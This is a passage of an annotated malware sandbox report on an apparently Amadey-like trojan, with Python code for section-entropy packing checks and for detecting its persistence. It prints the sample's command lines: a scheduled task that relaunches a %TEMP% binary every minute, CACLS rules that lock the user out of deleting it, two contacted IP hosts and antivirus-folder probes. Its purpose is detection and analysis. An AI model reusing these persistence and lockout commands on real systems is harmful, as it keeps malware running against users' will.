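logic as understood by the editor).  The .rdata row is from the report; the
.text row and the byte samples are constructed.
"""
import math
from collections import Counter

HIGH_ENTROPY = 6.8    # assumption: per-section threshold in bits per byte
OVERALL_RATIO = 0.2   # assumption: ratio threshold for the 'overall' finding


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packer_findings(sections):
    """sections: iterable of (name, size_of_data, entropy).

    Returns the sections flagged as high-entropy, the share of section bytes
    they account for, and whether that share crosses the 'overall' threshold.
    """
    total = 0
    high = 0
    flagged = []
    for name, size, entropy in sections:
        total += size
        if entropy > HIGH_ENTROPY:
            high += size
            flagged.append(name)
    ratio = high / total if total else 0.0
    return {"flagged": flagged, "ratio": ratio,
            "overall_high": bool(total) and ratio > OVERALL_RATIO}


def section_entropies(sections_bytes):
    """Convenience: (name, bytes) pairs -> (name, size, entropy) rows for packer_findings."""
    return [(name, len(data), shannon_entropy(data)) for name, data in sections_bytes]


# .rdata row copied from the report; the .text row is constructed so the totals
# reproduce the report's overall figure (0x92E00 bytes of section data).
REPORT_SECTIONS = [
    (".text", 0x92E00 - 0x92200, 5.1),   # constructed
    (".rdata", 0x92200, 7.6509165214488),
]

if __name__ == "__main__":
    import os
    print(round(shannon_entropy(os.urandom(65536)), 3))  # close to 8.0
    print(packer_findings(REPORT_SECTIONS))
    print(packer_findings(section_entropies([(".text", b"\x90" * 4096),
                                             (".rdata", os.urandom(4096))])))
```

Entropy alone does not prove packing: a section that legitimately holds compressed resources or a large .NET resource blob scores just as high, which is why the sandbox reports it as an indicator next to the packer and section-name signatures rather than as a verdict.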
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
host 45.9.74.80
host 5.42.65.80
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "..\207aa4515d" /P "test22:R" /E
cmdline CACLS "..\207aa4515d" /P "test22:N"
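The command lines above record the two halves of this sample's persistence: a scheduled task that re-launches oneetx.exe from %TEMP% every minute, and CACLS rules that first deny the logged-on user all access to the binary and its folder ("test22:N") and then grant read only ("test22:R" /E), so the user cannot delete what the task keeps starting. The detector below is an added example, not ZeroBOX's own logic: it scans a process tree's command lines for both behaviours and correlates them on the file name. The sample command lines are copied from the report, plus one constructed benign schtasks line; the user-writable path list and the verdict rules are this example's assumptions.

```python
"""Detect Amadey-style persistence in process command lines.

Added example, not ZeroBOX code.  Looks for (a) a scheduled task that runs a
binary from a user-writable location every minute and (b) CACLS deny ACLs
("/P user:N") on that binary or its folder, and correlates the two on the
file name.  Report lines are copied verbatim; the last sample line is a
constructed benign control.  USER_WRITABLE and the verdict rules are
assumptions.
"""
import re

SAMPLE_CMDLINES = [
    r'''SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F''',
    r'''"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit''',
    r'''CACLS "oneetx.exe" /P "test22:N"''',
    # Constructed benign control line (not from the report).
    r'''schtasks /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\backup.exe"''',
]

# Locations a standard user can write to (assumption; lower-case substrings).
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\users\public", r"\programdata")

SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b(?P<args>.*)', re.IGNORECASE)
SC_RE = re.compile(r"/sc\s+(\w+)", re.IGNORECASE)
MO_RE = re.compile(r"/mo\s+(\d+)", re.IGNORECASE)
TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# CACLS <object> /P <user>:N  -> replace ACL with a deny for <user>
CACLS_DENY_RE = re.compile(r'cacls\s+"?([^"\s]+)"?\s+/p\s+"?([^":]+):n"?', re.IGNORECASE)


def schtasks_findings(cmdline):
    """Details of a task-creation command line, or None if it is not one."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return None
    args = m.group("args")
    sc, mo, tr = SC_RE.search(args), MO_RE.search(args), TR_RE.search(args)
    schedule = sc.group(1).upper() if sc else ""
    modifier = int(mo.group(1)) if mo else 1          # schtasks defaults /MO to 1
    target = (tr.group(1) or tr.group(2)) if tr else ""
    return {
        "schedule": schedule,
        "modifier": modifier,
        "target": target,
        "every_minute": schedule == "MINUTE" and modifier <= 1,
        "user_writable_target": any(p in target.lower() for p in USER_WRITABLE),
    }


def cacls_denies(cmdline):
    """(object, user) for every 'CACLS <object> /P <user>:N' in the command line."""
    return CACLS_DENY_RE.findall(cmdline)


def assess(cmdlines):
    """Correlate every-minute tasks with deny ACLs on the task's binary."""
    tasks = [f for f in map(schtasks_findings, cmdlines) if f]
    denies = [d for c in cmdlines for d in cacls_denies(c)]
    minute_tasks = [t for t in tasks if t["every_minute"] and t["user_writable_target"]]
    task_names = {t["target"].rsplit("\\", 1)[-1].lower() for t in minute_tasks}
    protected = [obj for obj, _ in denies if obj.rsplit("\\", 1)[-1].lower() in task_names]
    if minute_tasks and protected:
        verdict = "amadey-like persistence"
    elif minute_tasks or denies:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "minute_tasks": minute_tasks,
            "denies": denies, "protected": protected}


if __name__ == "__main__":
    result = assess(SAMPLE_CMDLINES)
    print(result["verdict"])
    for obj, user in result["denies"]:
        print("deny ACL:", obj, "for", user)
```

The same two signals are available outside a sandbox: the task shows up in the Task Scheduler operational log or in `schtasks /Query /V /FO LIST` output with a one-minute trigger and a %TEMP% action, and the deny ACE is visible in `icacls` output on the dropped file, where a standard user's own file denying that user is rare enough to alert on.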
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Stealer.12!c
DrWeb Trojan.PWS.Stealer.35404
Cynet Malicious (score: 100)
CAT-QuickHeal TjnDroppr.Dapato.S28495190
McAfee GenericRXTU-AS!58BC43389C3E
Malwarebytes Trojan.Injector
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005a7a3c1 )
Alibaba TrojanDropper:Win32/Dapato.1e314a44
K7GW Trojan ( 005a7a3c1 )
Cybereason malicious.89c3e7
Arcabit Trojan.Razy.DE2571
BitDefenderTheta Gen:NN.ZexaF.36662.KqW@aKmNgYbi
Cyren W32/Lazy.U.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDropper.Agent.SRM
APEX Malicious
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender Gen:Variant.Razy.927089
MicroWorld-eScan Gen:Variant.Razy.927089
Avast Win32:Evo-gen [Trj]
Tencent Win32.Trojan-Spy.Stealer.Mqil
Emsisoft Gen:Variant.Razy.927089 (B)
F-Secure Trojan.TR/Dropper.Gen
VIPRE Gen:Variant.Razy.927089
TrendMicro Trojan.Win32.PRIVATELOADER.YXDIBZ
McAfee-GW-Edition BehavesLike.Win32.Generic.hc
Trapmine malicious.high.ml.score
FireEye Generic.mg.58bc43389c3e720c
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira TR/Dropper.Gen
Antiy-AVL Trojan[Spy]/Win32.Stealer
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Amadey.AMY!MTB
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Win32.Trojan.PSE.102OIFV
Google Detected
AhnLab-V3 Trojan/Win.Generic.R497632
VBA32 BScope.Trojan.Nitol
ALYac Gen:Variant.Razy.927089
MAX malware (ai score=80)
Cylance unsafe
Panda Trj/Genetic.gen
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXDIBZ
Rising Backdoor.DcRat!8.129D9 (TFE:1:BNER4NzZWDL)
Ikarus Trojan.Win32.Tnega
Fortinet W32/Tiny.NFR!tr